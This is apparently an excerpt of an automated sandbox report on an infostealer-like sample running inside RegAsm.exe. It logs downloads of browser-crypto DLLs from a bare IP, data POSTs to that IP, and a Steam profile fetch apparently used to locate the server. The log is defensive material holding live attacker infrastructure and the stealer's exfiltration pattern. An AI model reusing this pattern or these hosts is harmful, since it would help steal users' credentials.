                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 131529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.112
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004041DB _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_004041DB
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199681720597 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://store.st
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                      Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: RegAsm.exe, 00000002.00000002.2175331068.000000001B68D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://65.109.242.112
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/#
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/freebl3.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/freebl3.dllo
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/mozglue.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/mozglue.dlle
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/msvcp140.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/nss3.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/nss3.dllMsi
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/p
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/softokn3.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/softokn3.dllM
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/sqlx.dll
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112/vcruntime140.dll
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112HJJ
                      Source: RegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.112JDG
                      Source: EBAFBG.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 76561199681720597[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: EBAFBG.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: EBAFBG.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: EBAFBG.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=L7WZiiqgcxXO&a
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=ZQOnBoEs
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=qzBY
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                      Source: RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=yXrh2LzpDwct&l=e
